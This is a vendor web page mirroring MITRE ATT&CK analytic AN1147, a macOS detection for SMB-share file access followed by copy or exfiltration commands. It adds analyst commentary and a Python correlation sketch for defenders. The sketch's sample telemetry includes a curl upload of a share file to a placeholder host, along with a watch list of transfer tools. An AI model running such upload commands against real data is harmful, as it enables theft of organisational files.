MITRE ATT&CK® Analytic

AN1147: Analytic 1147

Detection of file access from mounted SMB shares followed by copy or exfil commands from Terminal or script interpreter processes.

Enterprise | AN1147 | Analytic | Object v1.0 | Modified
Glexia's Take

Analyst context for executives and security teams

Analyst confidence: Medium

AN1147 is a macOS detection analytic focused on a practical data-loss pattern: files accessed from mounted SMB shares and then copied or potentially exfiltrated through Terminal or script interpreter processes. For leaders, the value is not the analytic name; it is whether the organization can see when shared file repositories are being accessed from Macs and quickly moved using command-line tooling.

Executive priority

Prioritize this where macOS endpoints have access to SMB file shares containing sensitive business, customer, regulated, or operational data. The decision point is whether security teams can produce evidence of endpoint activity, share access, and command-line file movement during an incident or audit. This analytic supports resilience and compliance readiness by testing visibility over a common path from internal file access to unauthorized transfer, but the ATT&CK object does not provide tactics, relationships, or confirmed threat context.

Technical view

Validate coverage on macOS for sequences involving mounted SMB share file access followed by copy or exfiltration-like commands launched from Terminal or script interpreter processes. Because the official detection logic is not provided, SOC and detection engineering teams should define local correlation rules based on observed file paths, mounted share indicators, parent processes, command-line arguments, and timing. Tune carefully for legitimate administrative, backup, developer, and user file-transfer workflows.

Likely telemetry

  • macOS endpoint process execution telemetry
  • Command-line arguments from Terminal and script interpreter processes
  • File access events involving mounted SMB shares
  • File copy or transfer command activity
  • Mount information or filesystem path evidence showing SMB share usage

Detection direction

  • Confirm that macOS EDR or endpoint logging captures Terminal and script interpreter process starts with command-line detail.
  • Validate visibility into file access on mounted SMB shares, not only local disk activity.
  • Correlate SMB share access with subsequent copy or transfer commands within a defensible time window.
  • Baseline legitimate business workflows that copy files from SMB shares to reduce false positives.
  • Review blind spots where command-line arguments, mounted volume paths, or file access auditing are unavailable or inconsistently collected.
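One way to express the correlation that the Technical view and Detection direction sections describe, as an added example that is not MITRE's or Glexia's code and not an official ATT&CK detection rule. Everything in it is an assumption standing in for local telemetry: the Event schema and its field names (ts, kind, user, path, mount_fstype, image, parent, cmdline), the /Volumes mount root with filesystem type "smbfs", the interpreter and transfer-tool lists, the five-minute window, the allowlisted account svc_backup, and the sample events.

```python
"""Correlation sketch: SMB-share file access followed by a copy/transfer
command from a Terminal- or interpreter-parented process on macOS.

Added example; not MITRE or Glexia code. The Event schema, field names,
mount roots, tool lists, allowlist and sample events are all constructed
assumptions standing in for whatever the local EDR actually emits."""
from dataclasses import dataclass
from datetime import datetime, timedelta

# Assumed: SMB shares appear under /Volumes with filesystem type "smbfs".
SMB_MOUNT_ROOTS = ("/Volumes/",)
# Parents that indicate Terminal or script-interpreter origin (assumed list).
INTERPRETER_PARENTS = {"Terminal", "zsh", "bash", "sh", "python3", "osascript", "perl"}
# Copy/transfer tools to correlate on (local choice; tune per environment).
TRANSFER_TOOLS = {"cp", "rsync", "scp", "curl", "ditto", "tar", "zip"}
# Baselined workflows that are suppressed (constructed sample account).
APPROVED_TRANSFER_ACCOUNTS = {"svc_backup"}
# The "defensible time window" between share access and the transfer command.
WINDOW = timedelta(minutes=5)


@dataclass(frozen=True)
class Event:
    ts: datetime
    kind: str               # "file_access" or "process_start"
    user: str
    path: str = ""          # file_access: path touched
    mount_fstype: str = ""  # file_access: filesystem type of the mount
    image: str = ""         # process_start: executable basename
    parent: str = ""        # process_start: parent process name
    cmdline: str = ""       # process_start: full command line


def is_smb_share_access(ev):
    return (ev.kind == "file_access"
            and ev.path.startswith(SMB_MOUNT_ROOTS)
            and ev.mount_fstype == "smbfs")


def is_transfer_from_interpreter(ev):
    return (ev.kind == "process_start"
            and ev.image in TRANSFER_TOOLS
            and ev.parent in INTERPRETER_PARENTS)


def correlate(events):
    """Return one alert tuple (user, share_path, cmdline, seconds, confidence)
    per SMB-share access that is followed, within WINDOW, by a transfer command
    from an interpreter-parented process run by the same user. Confidence is
    "high" when the command line names the accessed file, else "medium"."""
    events = sorted(events, key=lambda e: e.ts)
    alerts = []
    for i, access in enumerate(events):
        if not is_smb_share_access(access):
            continue
        if access.user in APPROVED_TRANSFER_ACCOUNTS:
            continue  # baselined workflow: still logged upstream, not alerted
        for later in events[i + 1:]:
            if later.ts - access.ts > WINDOW:
                break  # events are sorted, so nothing further is in the window
            if later.user == access.user and is_transfer_from_interpreter(later):
                confidence = "high" if access.path in later.cmdline else "medium"
                alerts.append((access.user, access.path, later.cmdline,
                               int((later.ts - access.ts).total_seconds()),
                               confidence))
    return alerts


# Constructed sample telemetry covering a true hit, a local-disk decoy, an
# allowlisted account, an out-of-window pair and a non-transfer process.
T0 = datetime(2026, 1, 15, 9, 0, 0)
SAMPLE_EVENTS = [
    Event(T0, "file_access", "alice", path="/Volumes/finance/q4_forecast.xlsx", mount_fstype="smbfs"),
    Event(T0 + timedelta(seconds=40), "process_start", "alice", image="cp", parent="zsh",
          cmdline="cp /Volumes/finance/q4_forecast.xlsx /tmp/out"),
    Event(T0 + timedelta(minutes=1), "file_access", "bob", path="/Users/bob/notes.txt", mount_fstype="apfs"),
    Event(T0 + timedelta(minutes=1, seconds=10), "process_start", "bob", image="cp", parent="zsh",
          cmdline="cp /Users/bob/notes.txt /tmp"),
    Event(T0 + timedelta(minutes=2), "file_access", "svc_backup", path="/Volumes/finance/ledger.db", mount_fstype="smbfs"),
    Event(T0 + timedelta(minutes=2, seconds=5), "process_start", "svc_backup", image="rsync", parent="bash",
          cmdline="rsync -a /Volumes/finance/ /backup/finance/"),
    Event(T0 + timedelta(minutes=10), "file_access", "alice", path="/Volumes/finance/archive.zip", mount_fstype="smbfs"),
    Event(T0 + timedelta(minutes=20), "process_start", "alice", image="curl", parent="Terminal",
          cmdline="curl -T /Volumes/finance/archive.zip https://example.invalid/upload"),
    Event(T0 + timedelta(minutes=30), "file_access", "carol", path="/Volumes/eng/spec.pdf", mount_fstype="smbfs"),
    Event(T0 + timedelta(minutes=30, seconds=3), "process_start", "carol", image="Preview", parent="launchd",
          cmdline="/System/Applications/Preview.app/Contents/MacOS/Preview /Volumes/eng/spec.pdf"),
]


def run_sample():
    return correlate(SAMPLE_EVENTS)


if __name__ == "__main__":
    for alert in run_sample():
        print(alert)
```

Only the first pair fires: bob's copy is from local disk, svc_backup is a baselined workflow, alice's later curl falls outside the window, and carol's Preview launch is not a transfer tool. The confidence field shows the tightening worth adding once the basic correlation works: a command line that names the file just read from the share is a much stronger signal than any transfer tool running near any share access.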

Mitigation priorities

  • Classify and restrict SMB share access based on business need and data sensitivity.
  • Apply least-privilege access to shared repositories used by macOS endpoints.
  • Ensure endpoint monitoring and logging are enabled for macOS process and file activity relevant to mounted shares.
  • Use incident response playbooks that preserve endpoint, user, command-line, and share-access evidence.
  • Periodically test whether SOC teams can detect and investigate suspicious file movement from SMB shares on macOS.

Analyst notes and limits

This take is based only on the supplied ATT&CK analytic fields. AN1147 is a detection analytic for macOS; no ATT&CK tactics, relationships, aliases, or detailed official detection logic were supplied. Local implementation requires environment-specific knowledge of SMB share paths, approved transfer tools, endpoint logging depth, and normal user behavior.

The source does not provide rule logic, data source mappings, related techniques, adversary usage, or mitigation text. It should be treated as a validation prompt for macOS SMB-share file-movement visibility, not as proof of existing detection coverage or active exploitation.

Official MITRE ATT&CK definition

Analytic 1147

Detection of file access from mounted SMB shares followed by copy or exfil commands from Terminal or script interpreter processes.

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library).

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

Relationship explorer

All related ATT&CK context

No relationships are available in the current normalized data for this object.

Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see ATT&CK resources — Updates.

ATT&CK release: 19.1
Object version: 1.0
Created: (not shown in snapshot)
Modified: (not shown in snapshot)
Raw hash: 6f00dbc3352a221e...

Imported snapshots across ATT&CK releases (1)

Release | Bundle imported | Object version | Modified | Status | Raw hash
19.1 | (not shown) | 1.0 | (not shown) | Current bundle | 6f00dbc3352a…

Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. mitre-attack, AN1147 (external source URL)

Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.